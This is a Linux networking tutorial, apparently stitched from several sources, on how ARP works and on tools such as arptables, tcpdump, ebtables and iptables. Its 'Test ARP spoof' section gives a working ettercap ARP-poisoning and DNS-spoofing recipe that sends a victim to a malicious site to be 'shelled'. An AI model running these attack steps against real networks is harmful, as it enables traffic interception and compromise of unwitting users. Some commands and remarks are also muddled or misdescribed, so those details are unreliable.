ARP (Address Resolution Protocol) is a lower level (in TCP/IP stack) protocol which is used to convert IP address to MAC (Media Access Control) addresses.
IP addresses are dynamic (In general) but mac addresses, a link layer address, are almost static as they are allocated by the NIC (Network Interface Card) manufacturer.
Hence ARP is used to associates a relation between these IP addresses with static hardware address (MAC).
How The ARP works?
Whenever a router or switch or computer recieves a data packet with the destination IP address, then the device uses its ARP table to to look up the corresponding MAC address.
Suppose, if the packet’s IP address does not have a corresponding MAC address in the ARP table, then the device will send an ARP broadcast request on that local network to find out the MAC address for the IP address.
At this point, the computer which owns the IP address will take an appropriate response (or simply ARP reply) to the arp broadcast request packets.
When the device that sent the arp broadcast request request gets the response then it stores that mac address to IP address in its cache memory.
Now if the another packets arrives there for the same IP then it sends it to the mac address (just cached) without repeating the arp broadcast request and arp-replay process again.
How to hack ARP/Abuse ARP/Poison ARP
In this process the main critical point is that there is no authentication mechanism used here to verify that whether the ARP reply is coming from the same computer that owns the IP address, or not.
Using this loophole in the arp mechanism, it can be hacked easily if attacker sends fake request to abuse the device.
Another problem is that suppose a computer sends an ARP reply without any broadcast request then it caches this mac to IP address for the future use.
Hence arp can be hacked or attacked or abused in two ways:
-
1.First Method: In this method the hacker first listen for the arp broadcast requests and takes appropriate responses with their MAC address.
This method is not so usefull and efficient due to the reason that the hacker has not only to wait for the victims arp broadcast request but also to send the replay before the true host reply.
-
2.Second Method: The second method to poison the network is to send arp reply to target device, so the target device will update its IP-MAC table in cache memory with the recieved mac address.
Hence this method is simple and more effective than the first one.
Install arptables
Issue the following command:
sudo aptitude install arptables
Arptables is used to set up, maintain, and inspect the tables of ARP rules in the Linux kernel. It is analogous to iptables, but operates at the ARP layer rather than the IP layer.
Install other arp tools
Issue the following command:
sudo aptitude install arp-scan
sudo aptitude install dsniff
arp-sniff is an arp scanning and fingerprinting tool.
dsniff provides tools that can sniff network traffic for cleartext insecurities.
Display current ARP table
Issue the following command:
sudo arp -n
which should show something like:
Address HWtype HWaddress Flags Mask Iface
192.168.0.1 ether 00:22:3f:41:ff:b4 C eth0
192.168.0.10 ether 90:a4:de:ef:c0:70 C eth0
This will answer ARP requests for 192.168.0.1 on eth0 with the MAC address "00:22:3f:41:ff:b4", i.e. the address of the NIC.
Check ARP table
Issue the following command:
sudo tcpdump host 192.168.0.1
which should show something like:
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
09:17:49.425917 ARP, Reply server1.sharewiz.local is-at 00:22:3f:41:ff:b4 (oui Unknown), length 46
09:17:50.307530 ARP, Request who-has server1.sharewiz.net tell server1.sharewiz.local, length 46
09:17:50.307572 ARP, Reply server1.sharewiz.net is-at 08:00:27:f2:4b:5d (oui Unknown), length 28
09:17:54.914215 ARP, Request who-has 192.168.0.10 tell server1.sharewiz.local, length 46
09:17:59.921273 ARP, Request who-has server1.sharewiz.local tell server1.sharewiz.net, length 28
09:17:59.931486 ARP, Reply server1.sharewiz.local is-at 00:22:3f:41:ff:b4 (oui Unknown), length 46
09:18:00.861271 ARP, Request who-has server1.sharewiz.local tell 192.168.0.10, length 46
Press CTRL+C to cancel the command.
This command starts a ping to the server with tcpdump.
As can be seen, the ping packet on the guest starts an arp request. The server replies to the arp request correctly.
Configure ARP
The arp protocol can be tuned by writing to a file(s) in the /proc filesystem.
/proc/sys/net/
I think you can get what you want by increasing the gc_stale_time value.
Google for "gc_stale_time" for more info.
Clear ARP table
Issue the following command:
sudo ip neighbor flush all
Alternatively, issue the command sudo arp -d hostname repeatedly to accomplish this.
Test ARP spoof
Configure the DNS spoofing plugin to add a DNS record for our machine (which in this case’s IP is 192.168.0.11).
Issue the following command:
sudo vi /usr/share/ettercap/etter.dns
and add the following:
google.com A 192.168.0.11
*.google.com A 192.168.0.11
www.google.com PTR 192.168.0.11
and save the file.
Now we just fire up Ettercap and set it up to do an ARP poisoning attack with our plugin.
sudo ettercap -i eth0 -T -q -P dns_spoof -M ARP /192.168.0.10/ /192.168.0.1/
which should show something like the following:
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA
Listening on eth0.. (Ethenet)
eth0 -> 08:00:27:F2:4B:5D 192.168.0.11 255.255.255.0
SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...
etter.dns:47 Unknown record type PRT
28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services
Scanning for merged targets (2 hosts)...
* |====================================================>| 100.00 %
2 hosts added to the hosts list...
ARP poisoning victims:
GROUP 1 : 192.168.0.10 08:00:27:F2:4B:5D
GROUP 2 : 192.168.0.1 08:00:27:14:28:CE
Starting Unified sniffing...
Text only Interface activated...
Hit 'h' for inline help
Activating dns_spoof plugin...
This attack will redirect the traffic of the victim to our malicious site.
To do this we’re going to use ARP poisoning with the ettercap DNS spoofing plugin.
Ettercap is used to redirect our traffic so that our victim THINKS they are visiting Google when in reality they are just getting shelled.
http://www.whenisfive.com/2011/11/25/silly-set-tricks-combining-set-and-ettercap-for-surprisingly-amusing-results/
Clear routing table
Issue the following command:
sudo route del ROUTEDESCRIPTOR
Issue the command repeatedly to accomplish this.
Change MAC address on an ethernet card
Issue the following command:
sudo ethtool ethN -s phyad 01:22:33:44:55
which should show something like:
This will temporarily change the MAC address until either a reboot or if this command is reissued.
Enter the command man ethtool", looking at the the -e -E options change the firmware setting.
Quality of Service
You can start marking packets adding rules to the PREROUTING chain in the mangle table.
Issue the following command:
iptables -t mangle -A PREROUTING -p icmp -j MARK --set-mark 0x1
iptables -t mangle -A PREROUTING -p icmp -j RETURN
A -j RETURN is used so that packets do not traverse all the rules. icmp packets won't match other rules below RETURN. Keep that in mind.
Now you should be able to see packet count increasing when pinging from machines within the private network to some site on the Internet. Check packet count increasing in 1:10
tc -s class show dev eth0
There are documents that explain howto integrate ebtables and iptables, using the iptables module physdev.
Ethernet Firewall Security
Introduction
Ebtables is used to set up, maintain, and inspect the tables of Ethernet frame rules in the Linux kernel. It is analogous to iptables, but operates at the MAC (ARP) layer, rather than the IP layer.
If you need to filter or translate ARP traffic (at link layer), your firewall has bridged interfaces (for example a transparent bridge between a OpenVPN tunneled VLAN and a local VLAN, or bridged interfaces for virtualization), ebtables(8) is your friend.
The design is very similar to netfilter's iptables.
It manages rulesets in tables with chains and targets, using user space tools, but this time it's not in the default Debian installation, and you need to add it:
aptitude install ebtables
There are documents that explain howto integrate ebtables and iptables, using the iptables module physdev.
Application Firewall Security
Summary
To go more up, and manipulate the Layer 7 of the OSI model, and be able to define rules at application level, you need other tools.
For example... you open the port 80 to your users, but you don't want them to be able to download .exe files from internet. You need an application firewall or proxy.
The default kernel in Debian does not have layer 7 patches, but you can install user space proxys to manage this kind of filters.
There are options like squid, dans guardian, zorp, etc.
Zorp is written in python and has been added to Debian with 5.0.
See also the links section for the l7-filter project.
Troubleshooting software and tips
Some helpful (and must-have) tools are:
ip(8): (package: iproute) to list interfaces, addresses, route tables, etc.
nc(1): (package: netcat) to test tcp and udp conections, open ports, etc.
ping(8): to test ICMP traffic (not tcp or udp).
tail(1): and other tools to monitor logs.
tcpdump(8): (package: tcpdump) to monitor "raw" packets, traffic, etc. using filters and regular expresions.
It's very easy to lose connectivity when initially configuring a firewall. And it's easier the more complex the firewall is.
A basic skill for troubleshoot a firewall problem, is to know the points where the traffic passes, is turned, routed, can be rejected, etc. And to know how to monitor that points, and what is happening.
The most effective is to analyze the traffic from end to end, from the initial request, the DNS, the interfaces by which must pass, the translations that have to do, the rejected traffic logs, the routing rules, etc.
A common hack when doing ruleset designing, is to put a cron task, that flush rules every few minutes, in case you will make a mistake (working in remote).
References
http://ipset.netfilter.org/iptables.man.html
https://wiki.archlinux.de/?title=Firewall
http://oceanpark.com/notes/firewall_example.html
http://easyfwgen.morizot.net/gen/index.php
http://easyfwgen.morizot.net/gen/index.php
http://www.ossramblings.com/node?page=13
http://www.aczoom.com/blockhosts/download
http://blog.andrew.net.au/2005/02/16#ipt_recent_and_ssh_attacks
save the configuration using /etc/init.d/iptables save.
http://www.josefassad.com/iptables_rate_limit_module